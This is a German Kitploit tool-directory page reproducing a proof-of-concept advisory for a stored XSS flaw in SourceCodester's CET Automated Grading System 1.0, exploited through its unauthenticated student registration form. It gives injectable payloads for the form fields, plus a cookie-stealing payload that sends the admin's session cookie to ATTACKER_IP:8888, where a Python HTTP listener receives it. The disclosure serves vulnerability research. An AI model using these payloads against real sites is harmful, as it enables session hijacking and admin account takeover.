Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/xmyronn/cve-2026-7401-xss
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubxmyronn/cve-2026-7401-xss

CVE-2026-7401-XSS

Proof-of-Concept für gespeichertes XSS in SourceCodester CET Automated Grading System 1.0, das die nicht authentifizierte Payload-Injektion über die Schülerregistrierung demonstriert, die zur Übernahme der Admin-Sitzung führt.

Repository anzeigen
6vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Stored XSS im CET Automated Grading System — Studentenregistrierung (ohne Authentifizierung → Admin-Dashboard)

Details

FeldWert
AnbieterSourceCodester
Anbieter-URLhttps://www.sourcecodester.com
ProduktCET Automated Grading System mit KI-gestützter prädiktiver Analytik in PHP und MySQL
Produkt-URLhttps://www.sourcecodester.com/php/18686/cet-automated-grading-system-ai-predictive-analytics-php-and-mysql.html
Version1.0
SchwachstelleStored Cross-Site Scripting (XSS)
CWECWE-79
CVSSv3-Score8.8 (Hoch)
AngriffsvektorNetzwerk
Authentifizierung erforderlichKeine (Studentenselbstregistrierung ist öffentlich)
OpferAdministrator
BenutzerinteraktionErforderlich (Admin besucht Dashboard)
ForscherImad Alvi
Datum2026-04-13

Betroffene Komponente

Datei: PersonalAGS/index.php?action=register (Studentenregistrierung)
Parameter: student_id, full_name, section, username (POST)
Ausgelöst durch: PersonalAGS/index.php?action=dashboard (Admin-Dashboard)


Beschreibung

Das Studentenselbstregistrierungsportal im CET Automated Grading System 1.0 bereinigt oder kodiert die vom Benutzer eingegebenen Daten nicht, bevor sie in der Datenbank gespeichert werden. Ein nicht authentifizierter Angreifer kann ein Studentenkonto mit JavaScript-Payloads registrieren, die in beliebige Registrierungsfelder injiziert werden. Die bösartige Payload wird in der Datenbank gespeichert und im Browser jedes Administrators ausgeführt, der das Dashboard besucht, auf dem die eingeschriebenen Studenten aufgelistet sind.

Dies ist eine kritische Angriffskette — für die Injektion der Payload ist keine Authentifizierung erforderlich, sie wird jedoch in einem privilegierten Admin-Kontext ausgeführt, was den Diebstahl von Sitzungscookies und die vollständige Übernahme des Admin-Kontos ermöglicht.


Proof of Concept

Schritt 1 — Navigieren Sie zur Studentenregistrierung (keine Authentifizierung erforderlich)

Navigieren Sie zur öffentlichen Studentenselbstregistrierungsseite:

http://localhost/cet-personalagms/PersonalAGS/index.php?action=register

Schritt 2 — XSS-Payload in Registrierungsfelder injizieren

Füllen Sie alle Felder mit XSS-Payloads aus und klicken Sie auf Konto registrieren:

  • Studentenausweisnummer: "><svg onload=alert(1)>
  • Vollständiger Name: "><svg onload=alert(1)>
  • Sektion: "><svg onload=alert(1)>
  • Gewünschter Benutzername: "><svg onload=alert(1)>
Screenshot 2026-04-13 030707

Die Registrierung ist erfolgreich — die Payloads werden in der Datenbank gespeichert.

Schritt 3 — XSS wird im Admin-Dashboard ausgelöst

Wenn sich der Administrator anmeldet und das Dashboard besucht, wird die injizierte Payload sofort ausgeführt. Das Alert-Popup erscheint und das Seitenlayout wird durch das injizierte HTML sichtbar beschädigt — was bestätigt, dass die Payload im Admin-Panel unbereinigt gerendert wird.

Die Abschnittsüberschriften des Dashboards spiegeln ebenfalls die injizierten Werte wider:

  • 1ST YEAR - SECTION 1ST YEAR" ONMOUSEOVE
  • 3RD YEAR - SECTION " ONLOAD=ALERT(1) X=
Screenshot 2026-04-13 030717

Payload zur Sitzungsübernahme

Ein Angreifer kann dies zu einer vollständigen Übernahme der Admin-Sitzung eskalieren, indem er die folgende Payload in den Registrierungsfeldern verwendet:

" onmouseover="new Image().src='http://ATTACKER_IP:8888/?c='+document.cookie" x="

Richten Sie einen Listener auf dem Angreiferrechner ein:

python3 -m http.server 8888

Wenn der Admin das Dashboard besucht, wird sein Sitzungscookie an den Server des Angreifers gesendet, was eine vollständige Kontenübernahme ermöglicht.


Auswirkungen

Ein nicht authentifizierter Angreifer kann:

  • Persistentes JavaScript über die öffentliche Studentenregistrierung in das Admin-Dashboard injizieren
  • Das Sitzungscookie des Administrators stehlen und das Admin-Konto übernehmen
  • Jede Admin-Aktion im Namen des Opfers ausführen
  • Administratoren auf bösartige Seiten umleiten
  • Das Admin-Dashboard verunstalten

Für die Injektion der Payload ist keine Authentifizierung erforderlich. Der Angriff wird automatisch ausgeführt, wenn ein Administrator das Dashboard besucht.


Referenzen

  • SourceCodester — CET Automated Grading System
  • CWE-79: Unzureichende Neutralisierung von Eingaben bei der Generierung von Webseiten.
Tool herunterladen